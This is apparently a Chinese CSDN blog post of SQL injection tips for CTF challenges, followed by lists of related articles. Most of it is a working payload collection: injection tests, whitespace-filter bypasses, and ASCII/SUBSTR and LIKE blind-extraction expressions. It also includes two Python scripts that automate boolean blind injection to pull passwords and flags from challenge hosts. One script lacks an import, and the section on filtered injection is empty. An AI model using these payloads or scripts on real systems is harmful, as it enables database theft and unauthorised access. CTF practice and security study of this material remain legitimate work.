二、sql注入(CTF技巧)

已于 2024-03-15 11:32:55 修改
阅读量580 收藏 4
点赞数 2
分类专栏: # Web安全 文章标签: sql 数据库 mysql
于 2024-03-14 10:36:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46765649/article/details/136697632
版权

一、技巧

解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景

' --+    //字符型测试(看回显内容是否正确进行初步判断)
' %23	 //字符型测试(看回显内容是否正确进行初步判断)
1' and 1=2 --+ //字符型测试(确保‘1’的位置能查到数据,然后故意让其查不到数据,再次分析返回结果)
1' and 1=2 %23 //字符型测试(确保‘1’的位置能查到数据,然后故意让其查不到数据,再次分析返回结果)
1' order by 1000 --+ //字符型测试(确保‘1’的位置能查到数据,然后order by必然会报错,再次通过页面结果进行分析)
1' order by 1000 %23 //字符型测试(确保‘1’的位置能查到数据,然后order by必然会报错,再次通过页面结果进行分析)
' union SELECT 1 --+ //字符型测试(确保’的位置查不到数据,然后SELECT 1可能会报错,也有可能直接返回1,再次通过页面结果进行分析)
' union SELECT 1 %23 //字符型测试(确保’的位置查不到数据,然后SELECT 1可能会报错,也有可能直接返回1,再次通过页面结果进行分析)
1'and(1=2)%23 //字符型测试(绕过空格过滤)
1'and%0a1=2%23 //字符型测试(绕过空格过滤)
1'and%091=2%23 //字符型测试(绕过空格过滤)
1'and(ASCII(SUBSTR(DATABASE(),1,1))<1)%23 //字符型测试(绕过空格过滤)
1'and(ASCII(SUBSTR((select(flag)from(flag)),1,1))>1)%23//字符型测试(绕过空格过滤确保flag表flag列一定要存在)
1'and(ASCII(SUBSTR((select(group_concat(flag))from(flag)),1,1))>1)%23 //字符型测试(绕过空格过滤,确保flag表flag列一定要存在)
1'and((flag)like'D%')%23 //字符型测试(绕过空格过滤,确保flag列一定要存在)

1 and 1=2 //数字型测试(确保1的位置能查到数据,然后故意让其查不到数据,再次分析返回结果)
1 order by 1000 //数字型测试(order by必然会报错,再次通过页面结果进行分析)
-1 UNION SELECT 1 //数字型测试(确保’的位置查不到数据,然后SELECT 1可能会报错,也有可能直接返回1,再次通过页面结果进行分析)
(1)and(1=2)//数字型测试(绕过空格过滤)
(ASCII(SUBSTR(DATABASE(),1,1))<1)//数字型测试(绕过空格过滤,确保结果一定不成立再查看结果)
(ASCII(SUBSTR(DATABASE(),1,1))>1)//数字型测试(绕过空格过滤,确保结果一定成立再查看结果)
(flag)like'X%' //数字型测试(绕过空格过滤,确保flag列一定要存在)
(ASCII(SUBSTR((select(flag)from(flag)),1,1))>1)//数字型测试(绕过空格过滤,确保flag表flag列一定要存在)
(ASCII(SUBSTR((select(group_concat(flag))from(flag)),1,1))>1)//数字型测试(绕过空格过滤,确保flag表flag列一定要存在)

' --+
' %23
1' and 1=2 --+
1' and 1=2 %23
1' order by 1000 --+
1' order by 1000 %23
' union SELECT 1 --+
' union SELECT 1 %23
1'and(1=2)%23
1'and%0a1=2%23
1'and%091=2%23
1'and(ASCII(SUBSTR(DATABASE(),1,1))<1)%23
1'and(ASCII(SUBSTR((select(flag)from(flag)),1,1))>1)%23
1'and(ASCII(SUBSTR((select(group_concat(flag))from(flag)),1,1))>1)%23
1'and((flag)like'D%')%23
1 and 1=2
1 order by 1000
-1 UNION SELECT 1
(1)and(1=2)
(ASCII(SUBSTR(DATABASE(),1,1))<1)
(ASCII(SUBSTR(DATABASE(),1,1))>1)
(flag)like'X%'
(ASCII(SUBSTR((select(flag)from(flag)),1,1))>1)
(ASCII(SUBSTR((select(group_concat(flag))from(flag)),1,1))>1)

二、常用函数

  • like:通过列名 like 'xxx%'来进行穷尽爆破
    • SELECT * from users where id='-1' or username like 'D%'; #'
    • SELECT * from users where id='-1' or username like 'Du%'; #'
    • SELECT * from users where id='-1' or username like 'Dum%'; #'
    • SELECT * from users where id='-1' or username like 'Dumb%'; #'
  • ascii(a):获取a对应的ascii数值(ascii范围0-127)
  • ():例如select * from users where id=(1>2); (里面包着的值通过一些列操作最终返回Boolean值)
  • substr(‘123’,1,1):第一个参数是字符串,第二个参数表示取第几位(跟C语言等编程不一样,并非从0开始),第三个参数是步长

三、布尔盲注

解释:CTF里面有不少题目是关于盲注的,下面提供一些我遇到的可能有技巧的地方,在CTF里面布尔盲注时,往往都会告诉你列名(没有告诉就猜一下),此时我们可以采取列名 like 'xxx%'来进行爆破,或者采取普通的ascii(substr(str,1,1))>100

1.无过滤时注入

# 此种情况需要自己猜测出来列名,往往CTF都有暗示
import requests


class BoolCrash:
    def __init__(self, url, subject):
        self.subject = subject
        self.url = url
        self.list = string.ascii_letters + string.digits + string.punctuation
        self.empty = ''

    def run(self):
        while True:
            for i in self.list:
                # 下面3行需要自行构造
                sql_payloads = f"1' OR p3ss_w0rd like '{self.empty + i}%' #"
                # select id FROM emails where email_id='' or ascii(SUBSTR(`email_id`,0,1))=1 #' (类似这种写法的也很多)
                params = {'username': sql_payloads, 'password': '1'}
                response = requests.post(url=self.url, data=params)
                response = response.text
                # 布尔注入判断的条件
                if self.subject in response:
                    self.empty = self.empty + i
                    break
            # 当下一个内容不再出现在列表里面时,代表下一个内容为其它内容或为空,循环结束
            else:
                print('当前碰撞结束,结果可能因为list内容的局限而失败')
                break
            print(self.empty)

BoolCrash('http://eci-2ze9oa2p12vc9plzmnyh.cloudeci1.ichunqiu.com/Challenges/login.php','密码错误').run()

# 自己运行时,要根据实际情况,多调试几次,下面用#--------------划分的都是需要自定义的,也就是要按照实际情况进行修改的
import requests

def binary_search(sql_payloads, url):
    n = 128
    low = 0
    high = n - 1

    tem = sql_payloads  # 记录该值
    while low <= high:
        sql_payloads = tem  # 让每次循环的sql_payloads都是最处的值
        mid = (low + high) // 2
        # -------------------------------------------------------------
        sql_payloads = sql_payloads + f"{mid}" + ')'
        params = {'id': sql_payloads}

        response = requests.get(url=url, params=params)
        response = response.text
        # -------------------------------------------------------------
        # 表示满足条件
        if 'YES' in response:
            low = mid + 1
        else:
            high = mid - 1
    return low
def run():
    # -------------------------------------------------------------
    url = 'http://eci-2ze60ej08gskxf7qzvga.cloudeci1.ichunqiu.com/'
    # -------------------------------------------------------------
    str = ''
    i = 1
    while True:
        # 需要自己手动暂停
        # -------------------------------------------------------------
        sql_payloads = f'(ASCII(SUBSTR((select(flag)from(flag)),{i},1))>'
        # -------------------------------------------------------------
        i = i + 1
        n = binary_search(sql_payloads, url)
        str += chr(n)
        print(str)
run()

2.有过滤时注入

黑日里不灭的light
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 645
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
CTFSQL 注入 总结
algae
08-15 962
思路 技巧 常见URL编码 # %23 工具 sqlmap 绕过
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
2401_84973202的博客
05-11 1390
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
SQL注入次注入
qq_68163788的博客
01-29 1999
次注入是SQL注入攻击的一种变体,它发生在应用程序对用户输入进行了过滤和防御措施的情况下。在这种情况下,攻击者可能会利用应用程序中的另一个漏洞,例如存储型XSS漏洞,来注入恶意的SQL代码。这种情况下,攻击者利用应用程序中的另一个漏洞来实现对数据库的注入攻击,因此被称为次注入。 要防止次注入攻击,开发人员需要实施全面的安全措施,包括对用户输入进行严格的验证和过滤,使用参数化查询或者存储过程等安全的数据库访问方法,以及定期进行安全审计和漏洞扫描。
CTF入门之SQL注入
PolarPeak的博客
12-08 2173
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF 中的 SQL 注入总结
重新启程
10-12 4826
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
python sql注入漏洞 ctf_CTF 中的 SQL 注入总结
weixin_39641334的博客
12-09 845
flag 常见表1select flag from flagSQL 注入的基本原理123select * from user where username='' and pass=''# 构造 username=devnull' or '1后,sql 语句变成select * from user where username='devnull' or '1' and pass=''SQLMap1p...
CTF-SQL注入
m0_74317362的博客
07-25 698
加有
CTFHUB-SQL注入
m_de_g的博客
08-11 5664
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
CTF学习笔记:SQL注入(显错注入)
a12332251的博客
12-07 720
SQL注入
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。  一、引号绕过  会使用到引号的地方是在于后的whe
SQL注入原理及PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
ctfsql注入下的一些小技巧.doc
10-07
"ctfsql注入下的一些小技巧" CTF 中的 SQL 注入技巧是指在 Capture The Flag 比赛中使用的 SQL 注入技术,以获取 Flags 或者其他敏感信息。以下是 CTFSQL 注入的一些小技巧: 一、注释符 在 MySQL 中,有两...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
会Excel就会sql
svygh123的专栏
07-20 1454
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
求教Postgresql在jdbc处理bit(1)字段的预处理解决方案
weixin_44231698的博客
07-25 393
postgresql 在jdbc处理bit(1)字段
SQL 基础知识
最新发布
qq_62752002的博客
07-25 824
用于定义和管理数据库结构的命令。创建数据库创建表...删除数据库删除表修改表。
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段中输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框中构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值